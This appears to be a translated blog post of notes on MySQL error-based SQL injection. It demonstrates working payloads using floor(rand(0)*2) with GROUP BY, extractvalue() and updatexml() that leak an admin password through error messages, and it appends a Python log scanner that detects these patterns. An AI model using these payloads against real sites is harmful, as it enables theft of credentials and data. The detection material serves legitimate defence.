Posting some old notes. When MySQL executes a statement it raises an error message, and sites built on PHP+MySQL often print that error text on the page, so the following three techniques can be used to pull specific data out of the error message.

Actual test environment:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Triggering an error with floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
For example:

First, a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error.
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version is leaked through the error message. To retrieve other data, replace the version() call with the subquery you want.

For example, to retrieve the administrator's username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:
mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
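As an added, defender-side example that is not part of the original notes: a small Python log checker that flags the three request patterns above (floor(rand(0)*2) with GROUP BY, extractvalue(), updatexml()) and the two MySQL error strings that carry the leaked value. It assumes one raw request line per access-log entry and a PHP error log; the signature names and sample lines are constructed here.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures of the three techniques in the notes above:
# floor(rand(0)*2) paired with GROUP BY, extractvalue(), and updatexml().
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(", re.I)
GROUP_BY = re.compile(r"group\s+by", re.I)
XML_FUNCS = {
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}
# Server-side symptoms: the MySQL errors whose text carries the extracted value.
ERROR_SIGS = {
    "duplicate_group_key": re.compile(r"Duplicate entry '.+' for key 'group_key'"),
    "xpath_syntax_error": re.compile(r"XPATH syntax error: '.+'"),
}

def classify_request(raw_line):
    """Names of injection signatures found in one URL-encoded access-log line."""
    decoded = unquote_plus(raw_line)  # payloads arrive URL-encoded; match on the decoded form
    hits = [name for name, pat in XML_FUNCS.items() if pat.search(decoded)]
    if FLOOR_RAND.search(decoded) and GROUP_BY.search(decoded):
        hits.append("floor_rand_groupby")
    return sorted(hits)

def classify_error(raw_line):
    """Names of data-leaking MySQL error signatures found in one error-log line."""
    return sorted(name for name, pat in ERROR_SIGS.items() if pat.search(raw_line))

# Constructed sample lines for an offline run (not taken from the post's environment).
ACCESS_LOG = [
    "GET /article.php?id=1 HTTP/1.1",
    "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),"
    "floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1",
    "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1))) HTTP/1.1",
    "GET /article.php?id=1+and+1%3D(updatexml(1,concat(0x5e24,(select+user()),0x5e24),1)) HTTP/1.1",
]
ERROR_LOG = [
    "PHP Warning: mysql_query(): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "PHP Warning: mysql_query(): XPATH syntax error: '\\admin888'",
    "PHP Notice: Undefined index: id",
]

def scan(access_lines, error_lines):
    """Return (flagged request count, flagged error count) for alerting thresholds."""
    req = sum(1 for line in access_lines if classify_request(line))
    err = sum(1 for line in error_lines if classify_error(line))
    return req, err

if __name__ == "__main__":
    for line in ACCESS_LOG:
        print(classify_request(line) or "-", line[:70])
    for line in ERROR_LOG:
        print(classify_error(line) or "-", line)
```

A hit on the error-log side is the stronger signal: it means the database error, and the value inside it, reached the application layer, which is the condition the notes above rely on.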
That's all; thanks to the foreign guys.